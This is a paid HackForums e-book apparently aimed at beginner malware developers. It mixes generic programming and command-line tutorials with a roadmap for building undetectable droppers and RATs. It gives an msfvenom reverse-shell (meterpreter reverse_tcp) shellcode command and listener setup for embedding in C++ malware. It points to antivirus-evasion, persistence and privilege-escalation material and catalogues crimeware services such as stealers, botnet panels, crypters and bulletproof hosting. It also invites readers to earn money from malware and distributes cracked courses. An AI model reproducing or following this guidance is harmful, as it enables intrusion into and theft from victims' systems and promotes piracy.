Copyright 2022 WtfIsThis.

All Rights
Reserved.

MALWARE DEVELOPMENT
COURSE FOR BEGINNERS

By WtfIsThis on HackForums

Please do not leak the contents of this 1

course!
 WtfIsThis HackForums

Table of Contents
Introduction 03

Acknowledgments 04

Requirements 05

Essentials 06

Abbreviations 24

Malware Overview 25

Testing Environment 27

Write Your First C++

28
Malware
Make your Dropper
29
More Advanced

C++ RATs 30

Courses Order 31

Course Watching
32
Recommendations

The End 37

You can always contact me on HackForums at:

https://hackforums.net/member.php?action=profile&uid=5063966
Or in the sale’s thread:

2
 WtfIsThis HackForums

This course contains some cracked / non-licensed videos and

documents, if you’re kind enough, use some money made from
malware development and buy the original courses, I provide
I. Introduction
them in this course for learning purposes only.

A lot of discussions on malware analysis and automation tooling are already taking place, and every day brings
more. So you might be wondering:
Why another book on the same subject?
- First and foremost, it covers all the basics that will get you into malware programming in ASM/C/C++ or C#.
- Contains a lot of ‘premium’ courses and tutorials for free, that are already vouched for their information, e.g.
sektor7 institute.
- It’s updated weekly with new pages, samples, courses, links and information.
- By purchasing the book you get access to our discord server where you can ask us any question.
! The verification on our server is made manually, it may take a while until a moderator checks your ticket,
please be patient and have screenshots with the contract ready!

3
 WtfIsThis HackForums

II. Acknowledgments
I would like to thank all the readers who purchased the early access versions
of this e-book. Their continued support greatly motivated me to push
onward, without it, this book would never have been finished.
Thank you all for patiently waiting for this release! More interesting updates will come!

Sektor7
For their malware development related courses.
Links:
- RED TEAM Operator: Malware Development Essentials Course
- RED TEAM Operator: Malware Development Intermediate Course
- RED TEAM Operator: Windows Evasion Course
- RED TEAM Operator: Windows Persistence Course

Jose Portilla
- 2022 Complete Python Bootcamp From Zero to Hero in Python

Derek Banas
- C++ Programming Bootcamp

FreeCodeCamp.org
- For their awesome posts

HackerSploit
For his “Windows Privilege Escalation” course on YouTube.
Link: Windows Privilege Escalation

VX-Underground
For their large archive of malware samples and malware source code
Link: Malware Source Code

4
 WtfIsThis HackForums

III. Requirements
What should I know before reading this?

You can be a complete beginner when you buy this package, but it would be a plus if you had:
 A strong will to learn
 Some understanding of operating system architecture
 Some experience with Windows OS
 Basic programming knowledge (C/C#/C++/ASM/Java or even Python would be great)

Hardware needed:
 A computer / laptop
 Internet connection
 Min. 4GB of RAM
 At least 60GB free disk space on your HDD/SSD

Software needed (download tutorials and links available in the next chapters):
 The latest version of VirtualBox / VMware Pro
 Windows 10/11 as your main operating system / at least a virtual machine with it installed (a lot of the
tutorials showcase “windows only” applications).
 Visual Studio 2022 (recommended if you’re a beginner) / any other C++ compiler (recommended only if
you’re experienced with C/C++ programming). Use VSCodium as an alternative if you’re scared of closed
source applications.
 Metasploit (optional if you already have a shellcode ready, but it works on windows and it’s pretty standard),
we will mostly use this to generate C format shellcodes and test our ability to obfuscate / hide it from
antiviruses (we will bypass static and runtime scans).

5
 WtfIsThis HackForums

IV. Essentials
Where do I start if I am a complete
beginner?

Just the thought of learning to code can be very intimidating. The word code is mysterious by definition.
It implies a technical form of communication that computers, and not humans, are meant to understand.
One way many people start learning to code is by picking a popular programming language and
jumping in head first with no direction. This could take the form of an online coding course, a tutorial
project, or a random book purchase on a specific topic.
– freecodecamp.org

This programming roadmap outlines a set of relevant programming concepts, languages, and tools that
almost 100% of malware developers use every day:
1. Familiarize Yourself with Computer Architecture and Data Basics
2. Learn How Programming Languages Work
3. Understand How the Internet Works
4. Practice Some Command-Line Basics
5. Set-up your programming environment
6. Learn the basics of python
7. Switch to C++ (C# it’s pretty used in malware development too, but a lot of the resources and
tutorials here showcase native malware)

6
 WtfIsThis HackForums

1. Computer Architecture and Data

Basics - Part 1
Where do I start if I am a complete
beginner?

One of the wonderful things about modern programming languages is that they enable us to create
fancy applications without worrying about the nitty-gritty details of the hardware behind the scenes (for
the most part).
This is called abstraction – the ability to work with higher-level tools (in this case programming
languages) that simplify and narrow down the required scope of our understanding and skills.
However, that doesn't mean it's useless to know the basics of the metal that your code is executing on.
At the very least, being aware of a few tidbits will help you navigate workplace conversations about
high CPU and memory usage.
So, here is a bare minimum of computer architecture basics to get you started:
Your computer's most important parts live on microchips (also known as integrated circuits).
Microchips rely on an electrical component called a transistor to function. Transistors are tiny
electrical switches that are either off (0) or on (1) at any given time. A single microchip can contain
millions or billions of tiny transistors embedded on it.
Most modern computers have a microchip called the Central Processing Unit (CPU). You can think of
it as the computer’s brain. It handles most of the number crunching and logical tasks that the computer
performs.
Each CPU has something called an instruction set, which is a collection of binary (zeros and ones)
commands that the CPU understands. Luckily, we don't really need to worry about these as software
devs! That is the power of abstraction.
If the CPU is the logical center of the brain, it is useful to have memory as well to store information
temporarily or for the long term.

7
 WtfIsThis HackForums

1. Computer Architecture and Data

Basics - Part 2
Where do I start if I am a complete
beginner?

Computers have Random Access Memory (RAM) as "working memory" (or short-term memory) to
store information that is actively being used by running programs.
RAM is made up of a collection of memory addresses, which can be used to store bits of data. In older
languages like C, programmers do have access to working directly with memory addresses using a
feature called pointers, but this is rare in more modern languages.
Finally, we'll touch on a component you're surely familiar with – the hard drive. In our analogy of the
brain, this represents long-term memory. A hard drive is an internal or external device that stores data
that should persist even after the computer is turned off.
Before moving on to more details about programming languages, let's spend a second talking about data.
But what exactly do we mean by the word data?
At a high level, we think of things like text documents, images, videos, emails, files, and folders. These
are all high-level data structures that we create and save on our computers every day.
But underneath the hood, a computer chip (like a CPU or RAM chip) has no idea what an "image" or a
"video" is.
From a chip’s perspective, all of these structures are stored as long sequences of ones and zeros. These
ones and zeros are called bits.
Bits are commonly stored in a set of eight at a time, known as a byte. A byte is simply a sequence of
eight bits, such as 00000001, 01100110, or 00001111. Representing information in this way is called
a binary representation.

8
 WtfIsThis HackForums

2. Programming Languages
Where do I start if I am a complete
beginner?

In the previous section, we mentioned that most computers rely on a CPU, and a CPU can understand a
specific set of instructions in the form of ones and zeros. Therefore, we could theoretically write code
that tells the CPU what to do by stringing together long sequences of ones and zeros in a form the CPU
understands. Instructions written in binary form like this are called machine code. Sounds horrible to
work with, doesn't it? Well it probably is, but I wouldn't know since I mostly use higher-level
programming languages like JavaScript, Python, and Java.
A higher-level programming language provides a set of human-readable keywords, statements, and
syntax rules that are much simpler for people to learn, debug, and work with. Programming languages
provide a means of bridging the gap between the way our human brains understand the world and the
way computer brains (CPUs) understand the world. Ultimately, the code that we write needs to be
translated into the binary instructions (machine code) that the CPU understands. Depending on the
language you choose, we say that your code is either compiled or interpreted into machine code
capable of being executed by your CPU. Most programming languages include a program called
a compiler or an interpreter which performs this translation step.
Just to give a few examples – JavaScript and Python are interpreted languages while Java is a compiled
language. Whether a language is compiled or interpreted (or some combination of the two) has
implications for developer convenience, error handling, performance, and other areas, but we won't get
into those details here.
An interesting article that explains the difference between programming languages in malware
development: welcome to the dark side

9
 WtfIsThis HackForums

Here are some of the pros and cons of different programming languages when it comes
to developing your first FUD:

Language Difficulty Portability Scalability Size Performance Detection

Python/Ruby Easy Yes Yes Large Slow due to too Easy due to
much overhead too many
libraries
Golang Medium Yes Yes Large Faster than Medium
Python/ Ruby since not
many people
write in Go

C# (.NET) Medium No Yes Large Slow due to too Hard

much library
overhead

C/C++ Hard Yes – due to Yes Small Fast Hard

low level
nature
Assembly/ Hardest Yes No Smallest Fastest Hard
Shellcoding

Credits to niiconsulting.com for their “dark side” blog

10
 WtfIsThis HackForums

3. How the Internet Works – Part 1

Where do I start if I am a complete
beginner?

Whatever type of programming you aspire to do, you'll run into situations where it helps to know how
computers interact with each other. This typically occurs over the Internet.
The Internet is nothing more than a global collection of connected computers. In other words, it is a
global network. Each computer in the network agrees on a set of rules that enable them to talk to each
other. To a computer, "talking" means transferring data.
As we discussed in the previous section, all types of data – web pages, images, videos, emails, and so
on – can all be represented as ones and zeros.
Therefore, you can think of the Internet as a very large set of computers that can transfer ones and zeros
amongst themselves, in a way that preserves the meaning of that data. The Internet is nothing more than
a digital conversation medium.
If the Internet is just a big conversation arena, let’s define the conversation participants.
First, an analogy: most human conversations require at least two participants. In most cases, one person
initiates the conversation and the other person responds, assuming they are both present and available.
In Internet speak, the computer initiating the conversation is called the client. The computer responding
or answering is called the server.
For example, let’s say you open a web browser and go to "www.google.com". In this scenario, your
web browser is the client. By extension, you can also think of the computer you are working on as the
client.
In a more abstract sense, YOU are the client because you are the one initiating the conversation.

11
 WtfIsThis HackForums

3. How the Internet Works – Part 2

Where do I start if I am a complete
beginner?

By typing "www.google.com" into the search bar and clicking <ENTER>, your browser is requesting
to start a conversation with one of Google’s computers. Google’s computer is called the server. It
responds by sending the data required to display Google’s web page in your browser. And voilà!
Google’s web page appears in front of your eyes. All Internet data transfers utilize this sort of
client/server relationship.
Later in this chapter you will learn server-side and client-side programming, how sockets work in C,
how to create our own client and server, etc. It will be fun, believe me, but for now, let’s jump to the
next important part: Networking Fundamentals, for that I recommend: Network Direction

It’s not necessary to watch the entire playlist, but make sure you watched at least:
“Introduction to networking” – part 1
“How IP addresses work” – part 4
“IP addressing in depth” – part 5
“TCP/IP Model (internet protocol suite)” – part 6
“How TCP and UDP work” – part 7
“Establishing connections with TCP’s three way handshake” – part 8
“How TCP handles errors and uses windows” – part 9

12
 WtfIsThis HackForums

4. Command-Line Basics – Part 1

Where do I start if I am a complete
beginner?

The Command Line can be intimidating at first glance. It is often featured in movies as a cryptic black
screen with incomprehensible text, numbers, and symbols scrolling by. It is usually associated with an
evil hacker or genius techie sidekick.
The truth is that it doesn’t take a genius to use or understand the command line. In fact, it allows us to
perform many of the same tasks that we are comfortable doing via a point-and-click mouse.
The main difference is that it primarily accepts input via the keyboard, which can speed up inputs
significantly once you get the hang of it.
You can use the Command Line to browse through folders, list a folder’s contents, create new folders,
copy and move files, delete files, execute programs, and much more. The window in which you can
type commands on the Command Line is called a terminal.
Let's walk through a short tutorial of basic navigation commands that will give you a feel for working
on the command line.
Once you open your terminal, a typical first question is "Where am I"? We can use the “pwd” command
(which stands for "Print Working Directory") to figure that out. It outputs our current location in the file
system which tells us which folder we are currently in.

Now, let’s try for ourselves.

!! Skip the next 3 slides if you are using windows !!

13
 WtfIsThis HackForums

4. Command-Line Basics – Part 2

Where do I start if I am a complete
beginner?

If you’re on a Mac, open the Terminal app, which is essentially a Unix Command Line terminal.
If you’re running an operating system without a GUI (Graphical User Interface), like Linux or Unix, you
should be at the Command Line by default when you start the computer. If your flavor of Linux or Unix
does have a GUI, you’ll need to open the terminal manually.
At the prompt, type pwd and press <ENTER>. The Command Line will print out the path to the folder
that you’re currently in.
By default, the active folder when opening the Command Line is the logged-in user’s home directory.
This is customizable in case you want the convenience of starting in a different location.
For convenience, the home directory can be referenced using the tilde ~ character. We will use this in a
few examples going forward.
Now that we know what folder we’re in, we can use the ls command to list the contents of the current
directory. The ls command stands for "List".
Type ls and press <ENTER>. The contents (files and subfolders) that reside in the current directory are
printed to the screen.
Rerun the previous command like this ls -al and press <ENTER>. Now we will get more details about
the directory contents, including file sizes, modification dates, and file permissions.
The hyphen in the previous command allows us to set certain flags that modify the behavior of the
command. In this case we added the -a flag which will list all directory contents (including hidden files)
as well as the -l flag which displays the extra file details.

14
 WtfIsThis HackForums

4. Command-Line Basics – Part 3

Where do I start if I am a complete
beginner?

Next, we can create a new folder using the mkdir command, which stands for "Make Directory". Below
we create a new folder called "testdir".
To create multiple nested directories at once, use the -p flag to create a whole chain of directories like
this: mkdir -p directory1/directory2/directory3
The Command Line isn’t that useful if we can only stay in one location, so let’s learn how to browse
through different directories in the file system. We can do this via the cd command, which stands for
"Change Directory".
First, type cd testdir and press <ENTER>. Then type pwd and press <ENTER>. Note the output now
shows that we are inside the "testdir" directory specified in the cd command. We browsed into it!
Type cd .. and press <ENTER>. The .. tells the Command Line to browse backwards to the parent
directory.
Then type pwd and press <ENTER>. Note the output now shows that you are back in the original
directory. We browsed backwards!
Next we’ll learn how to create a new empty file in the current directory.
Type touch newfile1.txt and press <ENTER>. You can use the ls command to see that the new file was
created in the current directory.
Now we’ll copy that file from one folder to another using the cp command.
Type cp newfile1.txt testdir and press <ENTER>. Now use the ls and ls testdir commands to see that
the new file still exists in the current directory and was copied to the "testdir" directory.

15
 WtfIsThis HackForums

4. Command-Line Basics – Part 4

Where do I start if I am a complete
beginner?

We can also move files instead of copying using the mv command.

Type touch newfile2.txt and press <ENTER> to create a new file.
Next, type mv newfile2.txt testdir and press <ENTER> to move the file into the "testdir" folder.
Use the ls and ls testdir commands to confirm that the file has been moved into the "testdir" folder (it
should no longer appear in the original location you created it, since it was moved not copied).
The mv command can also be used to rename files.
To do that, type touch newfile3.txt and press <ENTER> to create a new file. Then type mv newfile3.txt
cheese.txt and press <ENTER> to update the file’s name. Use ls to confirm that the filed was renamed.
Finally, we can delete files and folders using the rm command.
Type rm cheese.txt and press <ENTER> to remove the file. Use ls to confirm the file was removed.
Type rm -rf testdir and press <ENTER> to remove the "testdir" directory and its contents. Use ls to
confirm the directory was removed.
Note that we need to use the -rf flags when removing directories. This forces the removal of the folder
and all of its contents.

16
 WtfIsThis HackForums

4. Command-Line Basics – Part 5

Where do I start if I am a complete
beginner?

If you are a windows user, here are some of the most important command prompt commands:

cmd command Description

call calls a batch file from another one
cd change directory
cls clear screen
cmd start command prompt
color change console color
date show/set date
dir list directory content
echo text output
exit exits the command prompt or a batch file
find find files

hostname display host name

pauses the execution of a batch file and shows a

pause
message
runas start a program as another user
shutdown shutdown the computer

sort sort the screen output

start an own window to execute a program or

start
command

17
 WtfIsThis HackForums

4. Command-Line Basics – Part 6

Where do I start if I am a complete
beginner?

cmd command Description

ftp transfer files to a FTP server
ftype display file type and mapping
getmac display MAC address
ipconfig display IP network settings
netsh configure/control/display network components
netstat display TCP/IP connections and status
nslookup query the DNS
pathping test the connection to a specific IP address
ping pings the network
route display network routing table, add static routes
displays computer-specific properties and
systeminfo
configurations
telnet establish Telnet connection
tftp transfer files to a TFTP server
tracert trace routes similar to patchping

taskkill terminate a process or a application

tasklist display applications and related tasks
time display/edit the system time
timeout wait any time

18
 WtfIsThis HackForums

4. Command-Line Basics – Part 7

Where do I start if I am a complete
beginner?

cmd command Description

attrib display file attributes
comp compare file contents
compact display/change file compression
copy / xcopy copy files
diskcomp compare content of two floppy disks
diskcopy copy floppy disc to another one

erase / del delete one or more files

expand extract files

fc copare files and display the differences
mkdir create a new directory

move move/rename files

rename rename files

replace replace files
rmdir / rd delete directory
tree display folder structure graphically
type display content of text files

19
 WtfIsThis HackForums

4. Command-Line Basics – Part 8

Where do I start if I am a complete
beginner?

cmd command Description

chkdsk check volumes

chkntfs display/change volume check at startup

defrag defragment media

diskpart volume management
driverquery display installed devices and their properties

format format volumes

label change volume name

mode configure interfaces/devices
mountvol assign/delete drive mountpoints
monitoring whether volumes are written
verify
correctly
show volume description and serial numbers of
vol
the HDDs

for for loop

gpresult display group policies

gpupdate update group policies
perfmon start performance monitor
prompt change command prompt
reg add/read/import/export registry entries

20
 WtfIsThis HackForums

5. Programming Environment
Where do I start if I am a complete
beginner?

If you are interested, here is a quick read about what a programming environment is:
https://themanifest.com/software-development/blog/programming-engineer

Anyway, if you’re a beginner, I recommend downloading

Visual Studio Community with the following components:

Develop Python Appl

ications

Develop C++ Applic

ations

You can use Visual Studio Code (or Codium, an open source alternative) as well for writing Python / C+
+ code, but I think Visual Studio it’s more intuitive (no need to select your compiler / write commands to
compile your project, etc.)

And you’re done with all the boring stuff! You can finally start learning a programming language!

21
 WtfIsThis HackForums

6. Basics of Python
Where do I start if I am a complete
beginner?

“Malware Development is essentially just programming for a very niche purpose, to infect systems (with
consent of course). In a red team / pentest manner, this typically is done with the goal to establish a C2
(Command and Control) session within a target organization. While malware is typically written
exclusively in compiled languages such as C/C++, C#, Nim, GOlang, etc. It is not necessarily required to
start off learning those languages. Personally, I would recommend learning programming with a language
like Python as its simplicity allows you to easily digest and understand topics in programming that can be
translated to lower level languages such as C/C++.” - makosec

Here are some resources to get started in Python:

-Python Bootcamp From Zero to Hero in Python (Recommended)
-learnpython.org
-pythonforbeginners.com

22
 WtfIsThis HackForums

6. Learn C++
Where do I start if I am a complete
beginner?

Once you have a solid foundation with general programming knowledge you will need to understand
some aspects of programming that python simply doesn’t teach. For example, you will have to
understand allocating / managing memory and data types such as pointers. This is where it is best to
become acquainted with some C# or C++. Keep in mind you don’t have to aim to be an expert in
programming with C# or C++ to write malware with those languages, however a basic understanding is
necessary!

Here are some resources to learn C++:

-C++ Programming Bootcamp (Recommended)
-freecodecamp.org website / freecodecamp.org YouTube course
-cplusplus.com
-w3schools.com

Pointers, memory allocation and some other features that we will use:
- Pointers
- Memory Allocation
- Character Sequence
- char*, std::string and char[]

23
 WtfIsThis HackForums

V. Abbreviations
CPP - C Plus Plus
PY - Python
C# - C-Sharp
ASM - Assembly Language
AES - Advanced Encryption Standard
XOR - Exclusive Or
BSoD - Blue Screen of Death
C&C - Command and Control
RTS - Runtime Scan
AV - Antivirus Software
UAC - User Account Control
DoS - denial of service
DDoS - distributed denial of service
BCD - Boot Configuration Data
BDS - Boot Device Selection
BIOS - Basic Input/Output System
UEFI - Unified Extensible Firmware Interface
DLL - Dynamic-Link Library
EXE - Executable Program
DXE - Driver Execution Environment
PoC - Proof of Concept
PPI - Pay-Per-Install
UID - Unique Identifier
RAT - Remote Access Tool
BOTNET - Robot Network
VM - Virtual Machine
VPS - Virtual Private Server
RDP - Remote Desktop Protocol

24
 WtfIsThis HackForums

VI. Malware Overview

The most common types of malware include worms, ransomware, RATs / botnets, trojans, adware &
spyware, stealers, crypto miners and rootkits.

Malware categories explained: Chad Russel (Recommended)

Classification Methods:
A Propagation Methods
- Worms

- Trojans

B Concealment Methods
- Loaders
- Droppers
- Packers / Crypters
- Rootkits
- RATs
- Metamorphic viruses

C Payload
- Ransomware

- Botnets

- Stealers

- Crypto Miners

- Keyloggers

- Adware 25
 WtfIsThis HackForums

D Targets
- File Infectors (“overview”)
- Macro Viruses (Microsoft, Excel. etc.)
- Boot sector viruses
- kernel viruses

E Malware Creation Tools / Crimeware

- Crypto Miner Panels (ex: Pure Miner)
- Loaders (ex: ICEX)
- Stealers (ex: Raccoon Stealer !project has been discontinued)
- RAT Panels (ex: BitRAT / VenomRAT)
- Botnet Panels (ex: XLoader)
- Crypting / Packing services (ex: Pure Crypter)
- Keyloggers (ex: Atom Logger)
- RaaS

F Services
- Spreading Methods and E-Books (ex: “Make real money with botnet”)
- Anonymous / Bulletproof Hosting (ex: CrazyRDP)
- RAT Setup (ex: Odinsmokesbowls !thread closed)
- PPI Botshops (ex: Zelos Loads)

26
 WtfIsThis HackForums

VII. Testing Environment

Setting up your testing environment will be pretty easy, all you need installed on your main computer is:
- Virtual Box / VMWare PRO
- Metasploit for Windows (click here for direct download)
- Windows 10 ISO file (blog tutorial / video tutorial)

Recommendations:
- If you don’t know how to install your VM, watch these tutorials:
VirtualBox Tutorial / VMWare Tutorial
- Give your Windows 10 VM at least 30gb of Disk Space, 2 CPUs and 3GB of RAM

VM Software (download the following software on your VM):

- Guest Additions (VirtualBox Only!)
- PE Bear
- ResHacker
- Process Hacker
- X64dbg
- Procmon
- RTO-MalDev (drag and drop)
- RTO-MDI (drag and drop)
- RTO-Pers (drag and drop)

! In the next update, I will create a premade windows 10 VM with all the necessary tools, but you can still
make your own (+ custom tools, like IDA) until then.

! If you want to use the VM from RTO, you can install it from: here (sektor7’s official website)

27
 WtfIsThis HackForums

VIII. Your first C++ malware

For your first C++ malware, I recommend watching Malware Development Essentials Course. For the
shellcode that you will execute, you can use calc.bin / msgbox.bin (the architecture depends on your
Windows VM, if you are not sure, run “systeminfo” and check system type :D ).

Path
If you want something more complex from the beginning, you can generate a payload with Metasploit.
Go to Your-Metasploit-Path/bin (ex: Metasploit-Framework/bin), open a CMD and use “cd /d
path/to/metasploit/bin” to navigate to the right folder.

Shellcode
Use msfvenom to generate your payload and use “–f c” at the end to generate a C format string. For
example, if I wanted to generate a reverse TCP payload on the IP “$IP” and port “$PORT” I would use:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f c
and I would copy paste the results into my c++ application.
! To get my $IP I used “ipconfig” in the cmd and copied my IPv4 Address (local test)
! I think the default msf port is 4444 (you may need to port forward)

Server
Use “msfconsole” to run metasploit. In my case, I would then select the generic payload handler by typing
“use multi/handler” and set the payload by typing “set payload windows/meterpreter/reverse_tcp”. I will
use “show options” to see what information I have to fill up. My LHOST is empty, so I have to use
“set LHOST $IP” to specify my server’s IP, then I will type “exploit” to start listening to any incoming
connection.

28
 WtfIsThis HackForums

Make your Dropper more

advanced

Code Injection / Avoid Modern Endpoint

API Hooking Protection
Learn from: Learn from: Windows Evasion Course
Malware Development Intermediate Co by Sektor7
urse
by Sektor7

Add Persistance Escalate Privileges

Learn from: Learn from:
Windows Persistence Course by Windows Privilege Escalation Course
Sektor7 by HackerSploit

! Please watch the courses in the order suggested here

29
 WtfIsThis HackForums

X. C++ RATs
In the next updates, you will learn how to:
- Create your own RAT: client & server with basic features / functionalities
- How to transform it into “shellcode” and obfuscate it with the loader you have already made

30
 WtfIsThis HackForums

Courses Order
What the right order for the courses?

If you don’t want to read the e-book and view the courses simultaneously, this is the right watch order:

1. Python Bootcamp From Zero to Hero in Python ( $75 )

2. C++ Programming Bootcamp ( $15 )
3. RED TEAM Operator - Malware Development Essentials Course ( $199 )
4. RED TEAM Operator - Malware Development Intermediate Course ( $229 )
5. RED TEAM Operator - Windows Evasion Course ( $239 )
6. RED TEAM Operator - Windows Persistence Course ( $239 )
7. Windows Privilege Escalation ( FREE )

31
 WtfIsThis HackForums

Recommendations
Python Bootcamp From Zero to Hero in
Python

Recommended:
1.Course Overview
2. Python Setup
3. Python Object and Data Structure Basics
4. Python Comparison Operators
5. Python Statements
6. Methods and Functions
7. Milestone Project – 1
8. Object Oriented Programming
9. Modules and Packages
10. Errors and Exceptions Handling
11. Milestone Project – 2
12. Python Decorators
13. Python Generators
14. Advanced Python Modules

Optional:
15. Web Scraping with Python
16. Working with Images with Python
17. Working with PDFs and Spreadsheet CSV Files
18. Emails with Python
19. Final Capstone Python Project
20. Advanced Python Objects and Data Structures
21. Bonus Material - Introduction to GUIs
22. APPENDIX OLDER PYTHON 2 MATERIAL
23. BONUS SECTION THANK YOU!

32
 WtfIsThis HackForums

Recommendations
C++ Programming Bootcamp

Recommended:
1. Course Introduction
2. Visual Studio Code Installation
3. C++ Basics, Data Types & Math
4. Conditionals, Looping & Math
5. Arrays & Vectors
6. Functions, Pointers & Exception Handling
7. Strings, Custom Functions & Solving Problems
8. Recursion, Overloading & Lambda
9. Object Oriented Programming
10. Polymorphism, Abstract and Overloading
11. Files, Functions as Variables & Headers
12. Templates, Iterators, Pointers & Malloc
13. Threads
14. Containers
15. Regular Expressions
16. Data Structures & Algorithms

33
 WtfIsThis HackForums

Recommendations
Malware Development Essentials Course

Recommended:
1. Intro and Setup (old .ova file installed in the tutorial, use this one instead)
2. Portable Executable
3. Droppers
4. Obfuscation and Hiding
5. Backdoors and Trojans
6. Code Injection
7. Extras
8. Combined Project
9. Summary

Resources:
Main Folder
RTO-MalDev
Assignment.txt

34
 WtfIsThis HackForums

Recommendations
Malware Development Intermediate Course

Recommended:
1. Intro and Setup
2. PE Madness
3. Code Injection
4. Reflective DLLs
5. x86 vs x64
6. Hooking
7. Payload Control via IPC
8. Combined Project
9. Summary

Resources:
Main Folder
RTO-MalDev2.ova
RTO-MDI

35
 WtfIsThis HackForums

Recommendations
Windows Evasion Course

Recommended:
1. Intro
2. Essentials
3. Non-privileged user vector
4. High-privileged user vector
5. Summary

Resources:
Main Folder

Windows Persistence Course

Recommended:
1. Intro
2. Low Privilege Persistence
3. Admin Level Persistence

Resources:
Main Folder
Assignments
RTO-Pers

36
 Last Words
This is the end of this E-Book ! I hope you enjoyed learning, watching the tutorials and
writing malware from scratch. All the sources, videos and books mentioned can be found
in the “/Resources” folder.
If you have any questions or other requests, just ask me on
HackForums.net, WtfIsThis.

THE END
Thank you for choosing this e-book!
New updates will come weekly, with sources, examples and more slides with useful information, please check the e-
book’s hackforums thread!

TOS
This e-book is for learning purpose only, don't do illegal things.
I'm not responsible in anyway for what you are doing with this e-book.
The redistribution or copying of this e-book is prohibited.
No refunds.